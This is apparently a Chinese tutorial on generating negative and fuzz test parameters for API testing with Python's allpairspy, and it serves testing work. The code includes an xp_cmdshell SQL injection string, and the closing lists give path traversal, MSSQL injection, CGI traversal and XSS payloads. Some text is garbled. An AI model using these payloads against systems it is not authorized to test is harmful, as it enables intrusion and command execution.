- 在接口測試中,經(jīng)常被各種逆向常見所困擾甩卓,之前我都是用的微軟的PICT工具來生成逆向參數(shù)鸠匀,拋開其他缺點(diǎn)不談,主要是只支持windows
- 下面用python的模塊來完成這項操作猛频,下面是簡單demo,可以根據(jù)自己實(shí)際需要擴(kuò)展
mport uuid
from allpairspy import AllPairs
# pip install allpairspy
from collections import OrderedDict
class BaseFuzzParams(object):
""" 設(shè)置接口的逆向參數(shù)
自動生成模糊接口參數(shù)第一步,提前準(zhǔn)備逆向場景
Args:
d: dict類型,正向接口參數(shù)
Returns:
dict
Raises:
無
"""
def __get_data(self, d):
data = {}
for i in d:
data[i] = []
# 加入一般規(guī)則
data[i].append({"info": "正確的值", "code": 1, "value": d[i], "key": i})
data[i].append({"info": "為空", "code": -1, "value": "", "key": i})
data[i].append({"info": "錯誤的值", "code": -2, "value": self.__param_format(type(d[i])), "key": i})
data[i].append({"info": "刪除", "code": -3, "key": i})
# 加入其它規(guī)則:如路徑遍歷辜荠,xss誉券,注入
return data
'''
生成逆向場景參數(shù)
'''
def __param_format(self, key):
if key == str:
return str(uuid.uuid1())
elif key == int:
return 963852 # 也可以使用隨機(jī)整數(shù)的方式
elif key == list:
return [str(uuid.uuid1())]
elif key == dict:
return {}
elif key == "inject":
return "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
# 路徑遍歷
elif key == "path_traversal":
pass
else:
return "null"
'''
得到逆向場景參數(shù)后,用AllPairs生成全對偶參數(shù)
'''
def __set_fuzz(self, d):
data = []
for i, par in enumerate(AllPairs(OrderedDict(d))):
app = []
for j in par:
app.append(j)
data.append(app)
dd = []
for i in data:
d = []
for j in range(len(i)):
d.append(i[j])
dd.append(d)
d2 = []
for i in dd:
d1 = []
for j in i:
app = {}
if j.get("code", -9) == -1:
app[j["key"]] = ""
elif j.get("code", -9) == -3:
pass
else:
app[j["key"]] = j["value"]
app["info"] = j["key"] + j["info"]
d1.append(app)
d2.append(d1)
return d2
'''
對外的函數(shù)瑰谜,處理生成的對偶場景接口參數(shù)
Returns:
[{},{}]
'''
def param_fi(self, d):
g_data = self.__get_data(d)
s_fuzz = self.__set_fuzz(g_data)
data = []
for i in s_fuzz:
for j in range(len(i)):
_info = ""
for k in range(len(i)):
_info = _info + "," + i[k]["info"]
i[0].update(i[k])
i[0]["info"] = _info.strip(",")
data.append(i[0])
break
return data
if __name__ == "__main__":
fz = BaseFuzzParams().param_fi({"user": "name", "id": 1001, "pwd": "!@#$^&*", "data": {"test": "hello"}, "my_list":["1", "2"]})
print(fz)
- 最后得到的參數(shù)結(jié)果為:
image.png
- 還可以加入些其他的逆向場景,如路徑遍歷,注入痢法,超長參數(shù)等,舉一些例子供大家參考
- 路徑遍歷
../../../../../../../{FILE}
../../../../../../../../{FILE}
..%2f{FILE}
..%2f..%2f{FILE}
- 注入攻擊
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
y or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
- 還可以用xss,cgi script這樣的方式
# cgi
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
AT-admin.cgi
AT-generate.cgi
# xss
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
- 當(dāng)然不同的請求方式也可以測試
OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
TRACK
CONNECT
